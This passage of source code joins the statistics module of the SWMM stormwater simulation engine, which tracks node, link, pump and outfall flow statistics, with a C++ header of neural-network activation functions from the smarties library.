OutfallStats = (TOutfallStats *) calloc(Nnodes[OUTFALL],
sizeof(TOutfallStats));
if ( !OutfallStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
else for ( j = 0; j < Nnodes[OUTFALL]; j++ )
{
OutfallStats[j].avgFlow = 0.0;
OutfallStats[j].maxFlow = 0.0;
OutfallStats[j].totalPeriods = 0;
if ( Nobjects[POLLUT] > 0 )
{
OutfallStats[j].totalLoad =
(double *) calloc(Nobjects[POLLUT], sizeof(double));
if ( !OutfallStats[j].totalLoad )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
for (k=0; k<Nobjects[POLLUT]; k++)
OutfallStats[j].totalLoad[k] = 0.0;
}
else OutfallStats[j].totalLoad = NULL;
}
}
// --- allocate memory & initialize pumping statistics
if ( Nlinks[PUMP] > 0 )
{
PumpStats = (TPumpStats *) calloc(Nlinks[PUMP], sizeof(TPumpStats));
if ( !PumpStats )
{
report_writeErrorMsg(ERR_MEMORY, "");
return ErrorCode;
}
else for ( j = 0; j < Nlinks[PUMP]; j++ )
{
PumpStats[j].utilized = 0.0;
PumpStats[j].minFlow = 0.0;
PumpStats[j].avgFlow = 0.0;
PumpStats[j].maxFlow = 0.0;
PumpStats[j].volume = 0.0;
PumpStats[j].energy = 0.0;
PumpStats[j].startUps = 0;
PumpStats[j].offCurveLow = 0.0;
PumpStats[j].offCurveHigh = 0.0;
}
}
// --- initialize system stats
MaxRunoffFlow = 0.0;
MaxOutfallFlow = 0.0;
SysStats.maxTimeStep = 0.0;
SysStats.minTimeStep = RouteStep;
SysStats.avgTimeStep = 0.0;
SysStats.avgStepCount = 0.0;
SysStats.steadyStateCount = 0.0;
return 0;
}
//=============================================================================
void stats_close()
//
// Input: none
//  Output:  none
// Purpose: closes the simulation statistics system.
//
{
int j;
FREE(SubcatchStats);
FREE(NodeStats);
FREE(LinkStats);
FREE(StorageStats);
if ( OutfallStats )
{
for ( j=0; j<Nnodes[OUTFALL]; j++ )
FREE(OutfallStats[j].totalLoad);
FREE(OutfallStats);
}
FREE(PumpStats);
}
//=============================================================================
void stats_report()
//
// Input: none
// Output: none
// Purpose: reports simulation statistics.
//
{
// --- report flow routing accuracy statistics
if ( Nobjects[LINK] > 0 && RouteModel != NO_ROUTING )
{
stats_findMaxStats();
report_writeMaxStats(MaxMassBalErrs, MaxCourantCrit, MAX_STATS);
report_writeMaxFlowTurns(MaxFlowTurns, MAX_STATS);
report_writeSysStats(&SysStats);
}
// --- report summary statistics
statsrpt_writeReport();
}
//=============================================================================
void stats_updateSubcatchStats(int j, double rainVol, double runonVol,
double evapVol, double infilVol,
double runoffVol, double runoff)
//
// Input: j = subcatchment index
// rainVol = rainfall + snowfall volume (ft3)
// runonVol = runon volume from other subcatchments (ft3)
// evapVol = evaporation volume (ft3)
// infilVol = infiltration volume (ft3)
// runoffVol = runoff volume (ft3)
// runoff = runoff rate (cfs)
// Output: none
// Purpose: updates totals of runoff components for a specific subcatchment.
//
{
SubcatchStats[j].precip += rainVol;
SubcatchStats[j].runon += runonVol;
SubcatchStats[j].evap += evapVol;
SubcatchStats[j].infil += infilVol;
SubcatchStats[j].runoff += runoffVol;
SubcatchStats[j].maxFlow = MAX(SubcatchStats[j].maxFlow, runoff);
}
//=============================================================================
//// New function added to release 5.1.008. //// //(5.1.008)
void stats_updateGwaterStats(int j, double infil, double evap, double latFlow,
double deepFlow, double theta, double waterTable,
double tStep)
{
Subcatch[j].groundwater->stats.infil += infil * tStep;
Subcatch[j].groundwater->stats.evap += evap * tStep;
Subcatch[j].groundwater->stats.latFlow += latFlow * tStep;
Subcatch[j].groundwater->stats.deepFlow += deepFlow * tStep;
Subcatch[j].groundwater->stats.avgUpperMoist += theta * tStep;
Subcatch[j].groundwater->stats.avgWaterTable += waterTable * tStep;
Subcatch[j].groundwater->stats.finalUpperMoist = theta;
Subcatch[j].groundwater->stats.finalWaterTable = waterTable;
if ( fabs(latFlow) > fabs(Subcatch[j].groundwater->stats.maxFlow) )
{
Subcatch[j].groundwater->stats.maxFlow = latFlow;
}
}
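//  Note (illustrative): the avgUpperMoist and avgWaterTable fields above
//  accumulate theta*tStep and waterTable*tStep, i.e. time-weighted integrals;
//  they presumably become true averages only after division by the total
//  reporting time in the report-writing code.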
//=============================================================================
void stats_updateMaxRunoff()
//
// Input: none
// Output: updates global variable MaxRunoffFlow
// Purpose: updates value of maximum system runoff rate.
//
{
int j;
double sysRunoff = 0.0;
for (j=0; j<Nobjects[SUBCATCH]; j++) sysRunoff += Subcatch[j].newRunoff;
MaxRunoffFlow = MAX(MaxRunoffFlow, sysRunoff);
}
//=============================================================================
//// New function added for release 5.1.008. //// //(5.1.008)
void stats_updateMaxNodeDepth(int j, double depth)
//
// Input: j = node index
// depth = water depth at node at current reporting time (ft)
// Output: none
// Purpose: updates a node's maximum depth recorded at reporting times.
//
{
if ( NodeStats != NULL )
NodeStats[j].maxRptDepth = MAX(NodeStats[j].maxRptDepth, depth);
}
//=============================================================================
void stats_updateFlowStats(double tStep, DateTime aDate, int stepCount,
int steadyState)
//
// Input: tStep = routing time step (sec)
// aDate = current date/time
// stepCount = # steps required to solve routing at current time period
// steadyState = TRUE if steady flow conditions exist
// Output: none
// Purpose: updates various flow routing statistics at current time period.
//
{
int j;
// --- update stats only after reporting period begins
if ( aDate < ReportStart ) return;
SysOutfallFlow = 0.0;
// --- update node & link stats
#pragma omp parallel num_threads(NumThreads) //(5.1.008)
{
#pragma omp for //(5.1.008)
for ( j=0; j<Nobjects[NODE]; j++ )
stats_updateNodeStats(j, tStep, aDate);
#pragma omp for //(5.1.008)
for ( j=0; j<Nobjects[LINK]; j++ )
stats_updateLinkStats(j, tStep, aDate);
}
//// Following code segment modified for release 5.1.012. //// //(5.1.012)
// --- update count of times in steady state
SysStats.steadyStateCount += steadyState;
// --- update time step stats if not in steady state
if ( steadyState == FALSE )
{
        // --- skip initial time step for min. value
if ( OldRoutingTime > 0 )
{
SysStats.minTimeStep = MIN(SysStats.minTimeStep, tStep);
}
SysStats.avgTimeStep += tStep;
SysStats.maxTimeStep = MAX(SysStats.maxTimeStep, tStep);
// --- update iteration step count stats
SysStats.avgStepCount += stepCount;
}
////
// --- update max. system outfall flow
MaxOutfallFlow = MAX(MaxOutfallFlow, SysOutfallFlow);
}
//=============================================================================
void stats_updateCriticalTimeCount(int node, int link)
//
// Input: node = node index
// link = link index
// Output: none
// Purpose: updates count of times a node or link was time step-critical.
//
{
if ( node >= 0 ) NodeStats[node].timeCourantCritical += 1.0;
else if ( link >= 0 ) LinkStats[link].timeCourantCritical += 1.0;
}
//=============================================================================
//// Function modified for release 5.1.008. //// //(5.1.008)
void stats_updateNodeStats(int j, double tStep, DateTime aDate)
//
// Input: j = node index
// tStep = routing time step (sec)
// aDate = current date/time
// Output: none
// Purpose: updates flow statistics for a node.
//
{
int k, p;
double newVolume = Node[j].newVolume;
double newDepth = Node[j].newDepth;
int canPond = (AllowPonding && Node[j].pondedArea > 0.0);
// --- update depth statistics
NodeStats[j].avgDepth += newDepth;
if ( newDepth > NodeStats[j].maxDepth )
{
NodeStats[j].maxDepth = newDepth;
NodeStats[j].maxDepthDate = aDate;
}
// --- update flooding, ponding, and surcharge statistics
if ( Node[j].type != OUTFALL )
{
if ( newVolume > Node[j].fullVolume || Node[j].overflow > 0.0 )
{
NodeStats[j].timeFlooded += tStep;
NodeStats[j].volFlooded += Node[j].overflow * tStep;
if ( canPond ) NodeStats[j].maxPondedVol =
MAX(NodeStats[j].maxPondedVol,
(newVolume - Node[j].fullVolume));
}
// --- for dynamic wave routing, classify a non-storage node as //(5.1.011)
// surcharged if its water level exceeds its crown elev. //(5.1.011)
if ( RouteModel == DW && Node[j].type != STORAGE && //(5.1.011)
newDepth + Node[j].invertElev + FUDGE >= Node[j].crownElev )
{
NodeStats[j].timeSurcharged += tStep;
}
}
// --- update storage statistics
if ( Node[j].type == STORAGE )
{
k = Node[j].subIndex;
StorageStats[k].avgVol += newVolume;
        StorageStats[k].evapLosses += Storage[k].evapLoss;
        StorageStats[k].exfilLosses += Storage[k].exfilLoss;
newVolume = MIN(newVolume, Node[j].fullVolume);
if ( newVolume > StorageStats[k].maxVol )
{
StorageStats[k].maxVol = newVolume;
StorageStats[k].maxVolDate = aDate;
}
StorageStats[k].maxFlow = MAX(StorageStats[k].maxFlow, Node[j].outflow);
}
// --- update outfall statistics
if ( Node[j].type == OUTFALL )
{
k = Node[j].subIndex;
if ( Node[j].inflow >= MIN_RUNOFF_FLOW )
{
OutfallStats[k].avgFlow += Node[j].inflow;
OutfallStats[k].maxFlow = MAX(OutfallStats[k].maxFlow, Node[j].inflow);
OutfallStats[k].totalPeriods++;
}
for (p=0; p<Nobjects[POLLUT]; p++)
{
OutfallStats[k].totalLoad[p] += Node[j].inflow *
Node[j].newQual[p] * tStep;
}
        // SysOutfallFlow is shared across the parallel node loop in
        // stats_updateFlowStats, so guard this accumulation against a race
        #pragma omp atomic
        SysOutfallFlow += Node[j].inflow;
}
// --- update inflow statistics
NodeStats[j].totLatFlow += ( (Node[j].oldLatFlow + Node[j].newLatFlow) *
0.5 * tStep );
if ( fabs(Node[j].newLatFlow) > fabs(NodeStats[j].maxLatFlow) )
NodeStats[j].maxLatFlow = Node[j].newLatFlow;
if ( Node[j].inflow > NodeStats[j].maxInflow )
{
NodeStats[j].maxInflow = Node[j].inflow;
NodeStats[j].maxInflowDate = aDate;
}
// --- update overflow statistics
if ( Node[j].overflow > NodeStats[j].maxOverflow )
{
NodeStats[j].maxOverflow = Node[j].overflow;
NodeStats[j].maxOverflowDate = aDate;
}
}
//=============================================================================
void stats_updateLinkStats(int j, double tStep, DateTime aDate)
//
// Input: j = link index
// tStep = routing time step (sec)
// aDate = current date/time
// Output: none
// Purpose: updates flow statistics for a link.
//
{
int k;
double q, v;
double dq;
// --- update max. flow
dq = Link[j].newFlow - Link[j].oldFlow;
q = fabs(Link[j].newFlow);
if ( q > LinkStats[j].maxFlow )
{
LinkStats[j].maxFlow = q;
LinkStats[j].maxFlowDate = aDate;
}
// --- update max. velocity
v = link_getVelocity(j, q, Link[j].newDepth);
if ( v > LinkStats[j].maxVeloc )
{
LinkStats[j].maxVeloc = v;
//LinkStats[j].maxVelocDate = aDate; //(5.1.008)
}
// --- update max. depth
if ( Link[j].newDepth > LinkStats[j].maxDepth )
{
LinkStats[j].maxDepth = Link[j].newDepth;
}
if ( Link[j].type == PUMP )
{
if ( q >= Link[j].qFull )
LinkStats[j].timeFullFlow += tStep;
if ( q > MIN_RUNOFF_FLOW )
{
k = Link[j].subIndex;
PumpStats[k].minFlow = MIN(PumpStats[k].minFlow, q);
PumpStats[k].maxFlow = LinkStats[j].maxFlow;
PumpStats[k].avgFlow += q;
PumpStats[k].volume += q*tStep;
PumpStats[k].utilized += tStep;
PumpStats[k].energy += link_getPower(j)*tStep/3600.0;
if ( Link[j].flowClass == DN_DRY )
PumpStats[k].offCurveLow += tStep;
if ( Link[j].flowClass == UP_DRY )
PumpStats[k].offCurveHigh += tStep;
if ( Link[j].oldFlow < MIN_RUNOFF_FLOW )
PumpStats[k].startUps++;
PumpStats[k].totalPeriods++;
LinkStats[j].timeSurcharged += tStep;
LinkStats[j].timeFullUpstream += tStep;
LinkStats[j].timeFullDnstream += tStep;
}
}
else if ( Link[j].type == CONDUIT )
{
// --- update time under normal flow & inlet control
if ( Link[j].normalFlow ) LinkStats[j].timeNormalFlow += tStep;
if ( Link[j].inletControl ) LinkStats[j].timeInletControl += tStep;
// --- update flow classification distribution
k = Link[j].flowClass;
if ( k >= 0 && k < MAX_FLOW_CLASSES )
{
++LinkStats[j].timeInFlowClass[k];
}
// --- update time conduit is full
k = Link[j].subIndex;
if ( q >= Link[j].qFull * (double)Conduit[k].barrels ) //(5.1.012)
LinkStats[j].timeFullFlow += tStep;
if ( Conduit[k].capacityLimited )
LinkStats[j].timeCapacityLimited += tStep;
//// Following section modified for release 5.1.008. //// //(5.1.008)
////
switch (Conduit[k].fullState)
{
case ALL_FULL:
LinkStats[j].timeSurcharged += tStep;
LinkStats[j].timeFullUpstream += tStep;
LinkStats[j].timeFullDnstream += tStep;
break;
case UP_FULL:
LinkStats[j].timeFullUpstream += tStep;
break;
case DN_FULL:
LinkStats[j].timeFullDnstream += tStep;
}
////
}
// --- update flow turn count
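    // (A "turn" is a reversal in the sign of the flow change dq between
    //  successive time steps; the 0.001 threshold below filters out
    //  numerical noise so negligible oscillations are not counted.)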
k = LinkStats[j].flowTurnSign;
LinkStats[j].flowTurnSign = SGN(dq);
if ( fabs(dq) > 0.001 && k * LinkStats[j].flowTurnSign < 0 )
LinkStats[j].flowTurns++;
}
//=============================================================================
void stats_findMaxStats()
//
// Input: none
// Output: none
// Purpose: finds nodes & links with highest mass balance errors
// & highest times Courant time-step critical.
//
{
int j;
double x;
// --- initialize max. stats arrays
for (j=0; j<MAX_STATS; j++)
{
MaxMassBalErrs[j].objType = NODE;
MaxMassBalErrs[j].index = -1;
MaxMassBalErrs[j].value = -1.0;
MaxCourantCrit[j].index = -1;
MaxCourantCrit[j].value = -1.0;
MaxFlowTurns[j].index = -1;
MaxFlowTurns[j].value = -1.0;
}
// --- find links with most flow turns
if ( StepCount > 2 )
{
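        // (The normalization below reports flow turns as a percentage of
        //  2/3 of the eligible time steps; the 2/3 factor appears to be an
        //  empirical cap on how often a reversal can occur.)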
for (j=0; j<Nobjects[LINK]; j++)
{
x = 100.0 * LinkStats[j].flowTurns / (2./3.*(StepCount-2));
stats_updateMaxStats(MaxFlowTurns, LINK, j, x);
}
}
// --- find nodes with largest mass balance errors
for (j=0; j<Nobjects[NODE]; j++)
{
// --- skip terminal nodes and nodes with negligible inflow
if ( Node[j].degree <= 0 ) continue;
if ( NodeInflow[j] <= 0.1 ) continue;
// --- evaluate mass balance error
// (Note: NodeInflow & NodeOutflow include any initial and final
// stored volumes, respectively).
if ( NodeInflow[j] > 0.0 )
x = 1.0 - NodeOutflow[j] / NodeInflow[j];
else if ( NodeOutflow[j] > 0.0 ) x = -1.0;
else x = 0.0;
stats_updateMaxStats(MaxMassBalErrs, NODE, j, 100.0*x);
}
// --- stop if not using a variable time step
if ( RouteModel != DW || CourantFactor == 0.0 ) return;
// --- find nodes most frequently Courant critical
if ( StepCount == 0 ) return; //(5.1.008)
for (j=0; j<Nobjects[NODE]; j++)
{
x = NodeStats[j].timeCourantCritical / StepCount;
stats_updateMaxStats(MaxCourantCrit, NODE, j, 100.0*x);
}
// --- find links most frequently Courant critical
for (j=0; j<Nobjects[LINK]; j++)
{
x = LinkStats[j].timeCourantCritical / StepCount;
stats_updateMaxStats(MaxCourantCrit, LINK, j, 100.0*x);
}
}
//=============================================================================
void stats_updateMaxStats(TMaxStats maxStats[], int i, int j, double x)
//
// Input: maxStats[] = array of critical statistics values
// i = object category (NODE or LINK)
// j = object index
// x = value of statistic for the object
// Output: none
// Purpose: updates the collection of most critical statistics
//
{
int k;
TMaxStats maxStats1, maxStats2;
maxStats1.objType = i;
maxStats1.index = j;
maxStats1.value = x;
for (k=0; k<MAX_STATS; k++)
{
if ( fabs(maxStats1.value) > fabs(maxStats[k].value) )
{
maxStats2 = maxStats[k];
maxStats[k] = maxStats1;
maxStats1 = maxStats2;
}
}
}
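//  Example (illustrative): stats_updateMaxStats() keeps maxStats[] ordered by
//  decreasing |value| using a single insertion pass. With MAX_STATS = 3 and
//  stored values {9, 5, 2}, inserting x = 6 yields {9, 6, 5}; the old 2 is
//  pushed off the end of the list.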
//=============================================================================
//
int stats_getNodeStat(int index, TNodeStats *nodeStats)
//
// Input:   index = node index
// Output:  nodeStats = pointer to the node's statistics struct
// Return:  error code
// Purpose: Gets a Node Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[NODE])
{
errorcode = ERR_API_OBJECT_INDEX;
}
else
{
memcpy(nodeStats, &NodeStats[index], sizeof(TNodeStats));
}
return errorcode;
}
int stats_getStorageStat(int index, TStorageStats *storageStats)
//
// Input:   index = node index of a storage unit
// Output:  storageStats = pointer to the storage unit's statistics struct
// Return:  error code
// Purpose: Gets a Storage Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[NODE])
{
errorcode = ERR_API_OBJECT_INDEX;
}
// Check Node Type is storage
else if (Node[index].type != STORAGE)
{
errorcode = ERR_API_WRONG_TYPE;
}
else
{
// fetch sub index
int k = Node[index].subIndex;
// Copy Structure
memcpy(storageStats, &StorageStats[k], sizeof(TStorageStats));
}
return errorcode;
}
int stats_getOutfallStat(int index, TOutfallStats *outfallStats)
//
// Input:   index = node index of an outfall
// Output:  outfallStats = pointer to the outfall's statistics struct
// Return:  error code
// Purpose: Gets an Outfall Stat for toolkitAPI
//
{
int errorcode = 0;
int p;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[NODE])
{
errorcode = ERR_API_OBJECT_INDEX;
}
// Check Node Type is outfall
else if (Node[index].type != OUTFALL)
{
errorcode = ERR_API_WRONG_TYPE;
}
else
{
// fetch sub index
int k = Node[index].subIndex;
// Copy Structure
memcpy(outfallStats, &OutfallStats[k], sizeof(TOutfallStats));
// Perform Deep Copy of Pollutants Results
if (Nobjects[POLLUT] > 0)
{
outfallStats->totalLoad =
(double *)calloc(Nobjects[POLLUT], sizeof(double));
if (!outfallStats->totalLoad)
{
errorcode = ERR_MEMORY;
}
if (errorcode == 0)
{
for (p = 0; p < Nobjects[POLLUT]; p++)
outfallStats->totalLoad[p] = OutfallStats[k].totalLoad[p];
}
}
else outfallStats->totalLoad = NULL;
}
return errorcode;
}
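//  Note: stats_getOutfallStat() above deep-copies the pollutant loads into a
//  freshly calloc'ed outfallStats->totalLoad array, so the toolkitAPI caller
//  owns that memory and must free() it to avoid a leak.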
int stats_getLinkStat(int index, TLinkStats *linkStats)
//
// Input:   index = link index
// Output:  linkStats = pointer to the link's statistics struct
// Return:  error code
// Purpose: Gets a Link Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[LINK])
{
errorcode = ERR_API_OBJECT_INDEX;
}
else
{
// Copy Structure
memcpy(linkStats, &LinkStats[index], sizeof(TLinkStats));
}
return errorcode;
}
int stats_getPumpStat(int index, TPumpStats *pumpStats)
//
// Input:   index = link index of a pump
// Output:  pumpStats = pointer to the pump's statistics struct
// Return:  error code
// Purpose: Gets a Pump Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[LINK])
{
errorcode = ERR_API_OBJECT_INDEX;
}
// Check if pump
else if (Link[index].type != PUMP)
{
errorcode = ERR_API_WRONG_TYPE;
}
else
{
// fetch sub index
int k = Link[index].subIndex;
// Copy Structure
memcpy(pumpStats, &PumpStats[k], sizeof(TPumpStats));
}
return errorcode;
}
int stats_getSubcatchStat(int index, TSubcatchStats *subcatchStats)
//
// Input:   index = subcatchment index
// Output:  subcatchStats = pointer to the subcatchment's statistics struct
// Return:  error code
// Purpose: Gets a Subcatchment Stat for toolkitAPI
//
{
int errorcode = 0;
// Check if Open
if (swmm_IsOpenFlag() == FALSE)
{
errorcode = ERR_API_INPUTNOTOPEN;
}
// Check if Simulation is Running
else if (swmm_IsStartedFlag() == FALSE)
{
errorcode = ERR_API_SIM_NRUNNING;
}
// Check if object index is within bounds
else if (index < 0 || index >= Nobjects[SUBCATCH])
{
errorcode = ERR_API_OBJECT_INDEX;
}
// Copy Structure
else
{
memcpy(subcatchStats, &SubcatchStats[index], sizeof(TSubcatchStats));
}
return errorcode;
}
|
Functions.h | //
// smarties
// Copyright (c) 2018 CSE-Lab, ETH Zurich, Switzerland. All rights reserved.
// Distributed under the terms of the MIT license.
//
// Created by Guido Novati (novatig@ethz.ch).
//
#ifndef smarties_Function_h
#define smarties_Function_h
#include "../../Utils/FunctionUtilities.h"
#include "../../Utils/Warnings.h"
#include <memory>
#ifndef PRELU_FAC
#define PRELU_FAC 0.1
#endif
//List of non-linearities for neural networks
//- eval returns f(in); also provided as an array-in / array-out overload
//- evalDiff returns f'(in)
//- initFactor: some activations prefer fan-in/fan-out scaling, others depend only on fan-in
//If adding a new function, edit makeFunction at the end of this file
namespace smarties
{
struct Function
{
  //weights are initialized with a uniform distribution on [-initFactor, initFactor]
virtual Real initFactor(const Uint inps, const Uint outs) const = 0;
virtual void eval(const nnReal*const in, nnReal*const out, const Uint N) const = 0; // f(in)
virtual nnReal eval(const nnReal in) const = 0;
  virtual nnReal inverse(const nnReal in) const = 0; // f^-1(in)
virtual nnReal evalDiff(const nnReal in, const nnReal out) const = 0; // f'(in)
virtual std::string name() const = 0;
virtual ~Function() {}
};
struct Linear : public Function
{
std::string name() const override { return "Linear";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(1./inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(1./inps);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
memcpy(out, in, N*sizeof(nnReal));
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
memcpy(out, in, N*sizeof(nnReal));
}
template <typename T> static T _eval(const T in)
{
return in;
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return 1;
}
nnReal eval(const nnReal in) const override
{
return in;
}
nnReal inverse(const nnReal in) const override
{
return in;
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return 1;
}
};
struct Tanh : public Function
{
std::string name() const override { return "Tanh"; }
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6./(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6./(inps + outs));
}
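  // Branch on the sign of the input so that std::exp always receives a
  // non-positive argument: tanh(x) = (1-e^(-2x))/(1+e^(-2x)) for x > 0,
  // which avoids overflow for large |x|.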
template <typename T> static T _eval(const T in)
{
if(in > 0) {
const T e2x = std::exp(-2*in);
return (1-e2x)/(1+e2x);
} else {
const T e2x = std::exp( 2*in);
return (e2x-1)/(1+e2x);
}
}
template <typename T> static T _inv(const T in)
{
assert(std::fabs(in)<1);
return std::log((1+in)/(1-in)) / 2;
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return 1 - out*out;
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
return _inv(in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct Sigm : public Function
{
std::string name() const override { return "Sigm";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6./(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6./(inps + outs));
}
template <typename T> static T _eval(const T in)
{
if(in > 0) return 1/(1+Utilities::safeExp(-in));
else {
const T ex = Utilities::safeExp(in);
return ex/(1+ex);
}
}
template <typename T> static T _inv(const T in)
{
assert(in > 0 && in < 1);
return - std::log(1/in - 1);
}
template <typename T> static T _evalDiff(const T in)
{
const T expx = Utilities::safeExp(in);
return expx / std::pow(expx+1, 2);
}
template <typename T> static T _evalDiff(const T in, const T out)
{
return out*(1-out);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
for(Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
return _inv(in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct HardSign : public Function
{
std::string name() const override { return "HardSign";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6./(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6./(inps + outs));
}
template <typename T> static T _eval(const T in)
{
return in/std::sqrt(1+in*in);
}
template <typename T> static T _evalDiff(const T in, const T out)
{
const T denom = std::sqrt(1+in*in);
return 1/(denom*denom*denom);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0; i<N; ++i) out[i] = in[i]/std::sqrt(1+in[i]*in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
    assert(std::fabs(in) < 1);
return in/std::sqrt(1 -in*in);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct HardSigmoid : public Function
{
std::string name() const override { return "HardSigmoid";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6./(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6./(inps + outs));
}
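  // HardSigmoid is the affine remap of HardSign onto (0,1):
  // y = (1 + x/sqrt(1+x^2))/2, which is why the inverse below first maps
  // y back to (-1,1) via map = 2y - 1.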
template <typename T> static T _eval(const T x)
{
return 0.5 * (1 + x/std::sqrt(1+x*x));
}
template <typename T> static T _evalDiff(const T x, const T y)
{
const T denom = std::sqrt(1+x*x);
return 0.5/(denom*denom*denom);
}
template <typename T> static T _evalDiff(const T x)
{
const T denom = std::sqrt(1+x*x);
return 0.5/(denom*denom*denom);
}
template <typename T> static T _inv(const T y)
{
assert(y > 0 && y < 1);
    const T map = 2 * y - 1;
    return map/std::sqrt(1 - map*map);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0; i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal y) const override
{
return _inv(y);
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct SoftSign : public Function
{
std::string name() const override { return "SoftSign";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(6.0/(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(6.0/(inps + outs));
}
template <typename T> static T _eval(const T in)
{
return in/(1 + std::fabs(in));
}
template <typename T> static T _evalDiff(const T in, const T out)
{
const T denom = 1 + std::fabs(in);
return 1/(denom*denom);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N)
{
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override
{
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override
{
return _eval(in);
}
nnReal inverse(const nnReal in) const override
{
    assert(std::fabs(in) < 1);
return in / (1 - std::fabs(in));
}
nnReal evalDiff(const nnReal in, const nnReal out) const override
{
return _evalDiff(in, out);
}
};
struct SoftRBF : public Function
{
std::string name() const override { return "SoftRBF";}
Real initFactor(const Uint inps, const Uint outs) const override {
return std::sqrt(6.0/(inps + outs));
}
static Real _initFactor(const Uint inps, const Uint outs) {
return std::sqrt(6.0/(inps + outs));
}
template <typename T> static T _eval(const T in) {
return 1/(1 + in * in);
}
template <typename T> static T _evalDiff(const T in, const T out) {
const T denom = 1 + in * in;
return - 2 * in / (denom * denom);
}
static void _eval(const nnReal*const in, nnReal*const out, const Uint N) {
#pragma omp simd aligned(in,out : VEC_WIDTH)
for (Uint i=0;i<N; ++i) out[i] = _eval(in[i]);
}
void eval(const nnReal*const in, nnReal*const out, const Uint N) const override {
return _eval(in, out, N);
}
nnReal eval(const nnReal in) const override {
return _eval(in);
}
nnReal inverse(const nnReal in) const override {
    die("Not supported");
    return 0; // unreachable: die() aborts; SoftRBF has no single-valued inverse
}
nnReal evalDiff(const nnReal in, const nnReal out) const override {
return _evalDiff(in, out);
}
};
struct Relu : public Function
{
std::string name() const override { return "Relu";}
Real initFactor(const Uint inps, const Uint outs) const override
{
return std::sqrt(2./inps);
}
static Real _initFactor(const Uint inps, const Uint outs)
{
return std::sqrt(2./inps);
}
template <typename T> static T _eval(const T in)
{
return in>0 ? in : 0;
}
